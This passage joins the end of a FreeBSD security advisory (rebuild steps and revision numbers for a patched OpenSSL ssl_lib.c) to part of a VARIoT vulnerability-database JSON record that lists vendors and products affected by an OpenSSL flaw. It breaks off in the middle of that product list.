    make obj && make depend && make && make install

    VI. Correction details

    The following list contains the revision numbers of each file that was corrected in FreeBSD.

    Branch Revision Path


    RELENG_5 src/crypto/openssl/ssl/ssl_lib.c 1.1.1.11.2.3 RELENG_5_5 src/UPDATING 1.342.2.35.2.16 src/sys/conf/newvers.sh 1.62.2.21.2.18 src/crypto/openssl/ssl/ssl_lib.c 1.1.1.11.2.1.4.2 RELENG_6 src/crypto/openssl/ssl/ssl_lib.c 1.1.1.12.2.2 RELENG_6_2 src/UPDATING 1.416.2.29.2.11 src/sys/conf/newvers.sh 1.69.2.13.2.11 src/crypto/openssl/ssl/ssl_lib.c 1.1.1.12.2.1.2.1 RELENG_6_1 src/UPDATING 1.416.2.22.2.22 src/sys/conf/newvers.sh 1.69.2.11.2.22 src/crypto/openssl/ssl/ssl_lib.c 1.1.1.12.6.2


    VII

    Show details on source website

    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-200110-0190",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": null,
            "scope": null,
            "trust": 3.2,
            "vendor": "oracle",
            "version": null
          },
          {
            "model": null,
            "scope": null,
            "trust": 2.4,
            "vendor": "debian gnu linux",
            "version": null
          },
          {
            "model": null,
            "scope": null,
            "trust": 2.4,
            "vendor": "f5",
            "version": null
          },
          {
            "model": null,
            "scope": null,
            "trust": 2.4,
            "vendor": "freebsd",
            "version": null
          },
          {
            "model": null,
            "scope": null,
            "trust": 2.4,
            "vendor": "openpkg",
            "version": null
          },
          {
            "model": null,
            "scope": null,
            "trust": 2.4,
            "vendor": "openssl",
            "version": null
          },
          {
            "model": null,
            "scope": null,
            "trust": 2.4,
            "vendor": "red hat",
            "version": null
          },
          {
            "model": null,
            "scope": null,
            "trust": 2.4,
            "vendor": "suse linux",
            "version": null
          },
          {
            "model": null,
            "scope": null,
            "trust": 2.4,
            "vendor": "slackware linux",
            "version": null
          },
          {
            "model": null,
            "scope": null,
            "trust": 2.4,
            "vendor": "ubuntu",
            "version": null
          },
          {
            "model": null,
            "scope": null,
            "trust": 2.4,
            "vendor": "rpath",
            "version": null
          },
          {
            "model": null,
            "scope": null,
            "trust": 1.6,
            "vendor": "trustix secure linux",
            "version": null
          },
          {
            "model": "openssl",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "openssl",
            "version": "0.9.7f"
          },
          {
            "model": "openssl",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "openssl",
            "version": "0.9.7j"
          },
          {
            "model": "openssl",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "openssl",
            "version": "0.9.8c"
          },
          {
            "model": "openssl",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "openssl",
            "version": "0.9.7k"
          },
          {
            "model": "openssl",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "openssl",
            "version": "0.9.7i"
          },
          {
            "model": "openssl",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "openssl",
            "version": "0.9.7g"
          },
          {
            "model": "openssl",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "openssl",
            "version": "0.9.8a"
          },
          {
            "model": "openssl",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "openssl",
            "version": "0.9.8b"
          },
          {
            "model": "openssl",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "openssl",
            "version": "0.9.8"
          },
          {
            "model": "openssl",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "openssl",
            "version": "0.9.7h"
          },
          {
            "model": "openssl",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "openssl",
            "version": "0.9.7b"
          },
          {
            "model": "openssl",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "openssl",
            "version": "0.9.7"
          },
          {
            "model": "openssl",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "openssl",
            "version": "0.9.7e"
          },
          {
            "model": "openssl",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "openssl",
            "version": "0.9.7c"
          },
          {
            "model": "openssl",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "openssl",
            "version": "0.9.7a"
          },
          {
            "model": "openssl",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "openssl",
            "version": "0.9.7d"
          },
          {
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "appgate network security",
            "version": null
          },
          {
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "apple computer",
            "version": null
          },
          {
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "attachmatewrq",
            "version": null
          },
          {
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "avaya",
            "version": null
          },
          {
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "blue coat",
            "version": null
          },
          {
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "cisco",
            "version": null
          },
          {
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "gentoo linux",
            "version": null
          },
          {
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "gnutls",
            "version": null
          },
          {
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "hewlett packard",
            "version": null
          },
          {
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "iaik java group",
            "version": null
          },
          {
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "ibm",
            "version": null
          },
          {
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "internet consortium",
            "version": null
          },
          {
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "intoto",
            "version": null
          },
          {
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "juniper",
            "version": null
          },
          {
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "mandriva",
            "version": null
          },
          {
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "mozilla",
            "version": null
          },
          {
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "openwall gnu linux",
            "version": null
          },
          {
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "opera",
            "version": null
          },
          {
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "rsa security",
            "version": null
          },
          {
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "ssh security corp",
            "version": null
          },
          {
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "sun microsystems",
            "version": null
          },
          {
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "sybase",
            "version": null
          },
          {
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "vmware",
            "version": null
          },
          {
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "vandyke",
            "version": null
          },
          {
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "stonesoft",
            "version": null
          },
          {
            "model": "openssl",
            "scope": "lte",
            "trust": 0.8,
            "vendor": "openssl",
            "version": "0.9.7k"
          },
          {
            "model": "openssl",
            "scope": "lte",
            "trust": 0.8,
            "vendor": "openssl",
            "version": "0.9.8c"
          },
          {
            "model": "e-business suite",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "oracle",
            "version": "11.5.10cu2"
          },
          {
            "model": "http server",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "oracle",
            "version": "9.2.0.8"
          },
          {
            "model": "asianux server",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "cybertrust",
            "version": "2.0"
          },
          {
            "model": "asianux server",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "cybertrust",
            "version": "2.1"
          },
          {
            "model": "asianux server",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "cybertrust",
            "version": "4.0"
          },
          {
            "model": "asianux server",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "cybertrust",
            "version": "4.0 (x86-64)"
          },
          {
            "model": "solaris",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "sun microsystems",
            "version": "10 (sparc)"
          },
          {
            "model": "solaris",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "sun microsystems",
            "version": "10 (x86)"
          },
          {
            "model": "turbolinux",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "turbo linux",
            "version": "10_f"
          },
          {
            "model": "turbolinux appliance server",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "turbo linux",
            "version": "1.0 (hosting)"
          },
          {
            "model": "turbolinux appliance server",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "turbo linux",
            "version": "1.0 (workgroup)"
          },
          {
            "model": "turbolinux appliance server",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "turbo linux",
            "version": "2.0"
          },
          {
            "model": "turbolinux desktop",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "turbo linux",
            "version": "10"
          },
          {
            "model": "turbolinux fuji",
            "scope": null,
            "trust": 0.8,
            "vendor": "turbo linux",
            "version": null
          },
          {
            "model": "turbolinux multimedia",
            "scope": null,
            "trust": 0.8,
            "vendor": "turbo linux",
            "version": null
          },
          {
            "model": "turbolinux personal",
            "scope": null,
            "trust": 0.8,
            "vendor": "turbo linux",
            "version": null
          },
          {
            "model": "turbolinux server",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "turbo linux",
            "version": "10"
          },
          {
            "model": "turbolinux server",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "turbo linux",
            "version": "10 (x64)"
          },
          {
            "model": "turbolinux server",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "turbo linux",
            "version": "11"
          },
          {
            "model": "turbolinux server",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "turbo linux",
            "version": "11 (x64)"
          },
          {
            "model": "turbolinux server",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "turbo linux",
            "version": "7"
          },
          {
            "model": "turbolinux server",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "turbo linux",
            "version": "8"
          },
          {
            "model": "wizpy",
            "scope": null,
            "trust": 0.8,
            "vendor": "turbo linux",
            "version": null
          },
          {
            "model": "home",
            "scope": null,
            "trust": 0.8,
            "vendor": "turbo linux",
            "version": null
          },
          {
            "model": "trendmicro interscan web security suite",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "trend micro",
            "version": "1.1 solaris edition"
          },
          {
            "model": "hp-ux",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "hewlett packard",
            "version": "11.11"
          },
          {
            "model": "hp-ux",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "hewlett packard",
            "version": "11.23"
          },
          {
            "model": "enterprise linux",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "red hat",
            "version": "2.1 (as)"
          },
          {
            "model": "enterprise linux",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "red hat",
            "version": "2.1 (es)"
          },
          {
            "model": "enterprise linux",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "red hat",
            "version": "2.1 (ws)"
          },
          {
            "model": "enterprise linux",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "red hat",
            "version": "3 (as)"
          },
          {
            "model": "enterprise linux",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "red hat",
            "version": "3 (es)"
          },
          {
            "model": "enterprise linux",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "red hat",
            "version": "3 (ws)"
          },
          {
            "model": "enterprise linux",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "red hat",
            "version": "4 (as)"
          },
          {
            "model": "enterprise linux",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "red hat",
            "version": "4 (es)"
          },
          {
            "model": "enterprise linux",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "red hat",
            "version": "4 (ws)"
          },
          {
            "model": "enterprise linux desktop",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "red hat",
            "version": "3.0"
          },
          {
            "model": "enterprise linux desktop",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "red hat",
            "version": "4.0"
          },
          {
            "model": "linux advanced workstation",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "red hat",
            "version": "2.1"
          },
          {
            "model": "hat red hat network satellite server",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "red",
            "version": "5.0"
          },
          {
            "model": "css11500 content services switch s",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "cisco",
            "version": "7.30"
          },
          {
            "model": "css11500 content services switch s",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "cisco",
            "version": "7.20"
          },
          {
            "model": "wide area file services",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "0"
          },
          {
            "model": "linux desktop",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "s u s e",
            "version": "1.0"
          },
          {
            "model": "hardware management console for pseries",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.3.7"
          },
          {
            "model": "firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.3"
          },
          {
            "model": "call manager sr2c",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.0"
          },
          {
            "model": "siparator",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.4"
          },
          {
            "model": "siparator",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.5.2"
          },
          {
            "model": "-releng",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "freebsd",
            "version": "4.11"
          },
          {
            "model": "security agent",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "5.1.79"
          },
          {
            "model": "networks vpn router contivity",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "-26000"
          },
          {
            "model": "enterprise linux es ia64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "2.1"
          },
          {
            "model": "openvpn",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openvpn",
            "version": "2.0.5"
          },
          {
            "model": "server b",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "filezilla",
            "version": "0.9.16"
          },
          {
            "model": "project openssl g",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.7"
          },
          {
            "model": "secure acs solution engine",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "model": "computing snapgear sg565",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "secure",
            "version": "0"
          },
          {
            "model": "openbsd",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openbsd",
            "version": "3.9"
          },
          {
            "model": "server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "filezilla",
            "version": "0.9.2"
          },
          {
            "model": "ciscoworks common services",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "2.2"
          },
          {
            "model": "ons optical transport platform",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "154544.6(0)"
          },
          {
            "model": "project openssl b",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.8"
          },
          {
            "model": "ons 15454sdh",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.0(1)"
          },
          {
            "model": "server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "filezilla",
            "version": "0.8.3"
          },
          {
            "model": "secure acs for unix",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "2.0"
          },
          {
            "model": "cwrsync",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "cwrsync",
            "version": "2.0.10"
          },
          {
            "model": "servercluster",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "stonesoft",
            "version": "2.5"
          },
          {
            "model": "appliance server hosting edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "turbolinux",
            "version": "1.0"
          },
          {
            "model": "system management homepage",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "2.1.2"
          },
          {
            "model": "s8500 r2.0.1",
            "scope": null,
            "trust": 0.3,
            "vendor": "avaya",
            "version": null
          },
          {
            "model": "hardware management console for pseries",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.3.2"
          },
          {
            "model": "fuji",
            "scope": null,
            "trust": 0.3,
            "vendor": "turbolinux",
            "version": null
          },
          {
            "model": "hardware management console for pseries r1.0",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "5.0"
          },
          {
            "model": "project openssl b",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.7"
          },
          {
            "model": "cwrsync",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cwrsync",
            "version": "2.0.9"
          },
          {
            "model": "hardware management console for iseries r4.0",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0"
          },
          {
            "model": "call manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "5.1"
          },
          {
            "model": "ons optical transport platform",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "154543.1.0"
          },
          {
            "model": "workcentre",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "xerox",
            "version": "76650"
          },
          {
            "model": "css11500 content services switch",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "7.4"
          },
          {
            "model": "messaging storage server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "2.0"
          },
          {
            "model": "project openssl b-36.8",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.6"
          },
          {
            "model": "networks meridian option 61c",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "1-0"
          },
          {
            "model": "http server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "9.2.0"
          },
          {
            "model": "systems management homepage",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "2.1.7.168"
          },
          {
            "model": "linux lts amd64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "6.06"
          },
          {
            "model": "server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "filezilla",
            "version": "0.9.8"
          },
          {
            "model": "ons optical transport platform",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "154544.1(1)"
          },
          {
            "model": "ftp server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "serv u",
            "version": "6.00"
          },
          {
            "model": "works common services",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "3.0"
          },
          {
            "model": "ons optical transport platform",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "154544.6(1)"
          },
          {
            "model": "workcentre pro",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "xerox",
            "version": "232"
          },
          {
            "model": "s8700 cm",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "3.1"
          },
          {
            "model": "s8300 cm",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "3.1"
          },
          {
            "model": "-release",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "freebsd",
            "version": "5.4"
          },
          {
            "model": "linux professional oss",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "s u s e",
            "version": "10.0"
          },
          {
            "model": "mds",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "90001.3"
          },
          {
            "model": "linux enterprise server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "suse",
            "version": "8"
          },
          {
            "model": "system management homepage",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "hp",
            "version": "2.1.9"
          },
          {
            "model": "firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.2.3"
          },
          {
            "model": "linux professional x86 64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "s u s e",
            "version": "9.3"
          },
          {
            "model": "secure linux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "trustix",
            "version": "3.0"
          },
          {
            "model": "suse linux retail solution",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "s u s e",
            "version": "8.0"
          },
          {
            "model": "-release",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "freebsd",
            "version": "6.1"
          },
          {
            "model": "linux enterprise desktop",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "suse",
            "version": "10"
          },
          {
            "model": "ons",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "154548.0"
          },
          {
            "model": "solaris data encryption kit",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sun",
            "version": "x8610.0"
          },
          {
            "model": "linux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "slackware",
            "version": "9.1"
          },
          {
            "model": "enterprise linux as",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "3"
          },
          {
            "model": "appliance server workgroup edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "turbolinux",
            "version": "1.0"
          },
          {
            "model": "siparator",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.2.1"
          },
          {
            "model": "ons 15454sdh",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.1(2)"
          },
          {
            "model": "stonegate high availability firewall and vpn",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "stonesoft",
            "version": "3.0"
          },
          {
            "model": "ipcop",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ipcop",
            "version": "1.4.11"
          },
          {
            "model": "openvpn",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openvpn",
            "version": "1.4.2"
          },
          {
            "model": "hardware management console for iseries r5.0",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0"
          },
          {
            "model": "wide area application services",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "0"
          },
          {
            "model": "s8710 cm",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "3.1"
          },
          {
            "model": "server c",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "filezilla",
            "version": "0.9.8"
          },
          {
            "model": "hardware management console",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.3.7"
          },
          {
            "model": "linux mandrake",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "mandrakesoft",
            "version": "2007.0"
          },
          {
            "model": "secure acs solution engine",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "3.3.1"
          },
          {
            "model": "grid engine update5",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sun",
            "version": "6.0"
          },
          {
            "model": "linux database server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "s u s e",
            "version": "0"
          },
          {
            "model": "suse linux standard server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "s u s e",
            "version": "8.0"
          },
          {
            "model": "security agent",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.0"
          },
          {
            "model": "hardware management console for pseries r5.0",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0"
          },
          {
            "model": "linux professional",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "s u s e",
            "version": "10.1"
          },
          {
            "model": "hardware management console for iseries",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.3.7"
          },
          {
            "model": "linux mandrake x86 64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "mandrakesoft",
            "version": "2006.0"
          },
          {
            "model": "siparator",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.5.1"
          },
          {
            "model": "ons 15454sdh",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.1(3)"
          },
          {
            "model": "security agent",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "2.1"
          },
          {
            "model": "grid engine update7",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sun",
            "version": "6.0"
          },
          {
            "model": "hardware management console",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "5.2.1"
          },
          {
            "model": "linux professional",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "s u s e",
            "version": "9.3"
          },
          {
            "model": "stonebeat fullcluster for raptor",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "stonesoft",
            "version": "2.0"
          },
          {
            "model": "ons optical transport platform",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "154543.2.0"
          },
          {
            "model": "-stable",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "freebsd",
            "version": "6.1"
          },
          {
            "model": "ons 15454sdh",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.1(0)"
          },
          {
            "model": "openpkg",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openpkg",
            "version": "2.5"
          },
          {
            "model": "server 0.9.1b",
            "scope": null,
            "trust": 0.3,
            "vendor": "filezilla",
            "version": null
          },
          {
            "model": "download accelarator",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "prozilla",
            "version": "1.4.0"
          },
          {
            "model": "ciscoworks common management foundation",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "2.0"
          },
          {
            "model": "call manager es32",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.1"
          },
          {
            "model": "call manager 4.1 sr4",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "model": "system management homepage",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "2.1.6"
          },
          {
            "model": "openvms secure web server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "2.1-1"
          },
          {
            "model": "ons optical transport platform",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "154544.14"
          },
          {
            "model": "project openssl g",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.6"
          },
          {
            "model": "open-enterprise-server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "s u s e",
            "version": "0"
          },
          {
            "model": "ons 15454sdh",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.1(1)"
          },
          {
            "model": "security agent",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.0.2"
          },
          {
            "model": "project openssl h",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.7"
          },
          {
            "model": "server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "filezilla",
            "version": "0.8.8"
          },
          {
            "model": "siparator",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "3.2.1"
          },
          {
            "model": "stonegate ips sensor and analyzer",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "stonesoft",
            "version": "2.0"
          },
          {
            "model": "server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "filezilla",
            "version": "0.9.9"
          },
          {
            "model": "server a",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "filezilla",
            "version": "0.9.8"
          },
          {
            "model": "secure acs for windows nt",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "2.6"
          },
          {
            "model": "openvms secure web server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "1.2"
          },
          {
            "model": "propack sp6",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sgi",
            "version": "3.0"
          },
          {
            "model": "computing snapgear sg560",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "secure",
            "version": "0"
          },
          {
            "model": "suse linux school server for i386",
            "scope": null,
            "trust": 0.3,
            "vendor": "s u s e",
            "version": null
          },
          {
            "model": "project openssl i",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.7"
          },
          {
            "model": "grid engine sun linux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sun",
            "version": "5.3"
          },
          {
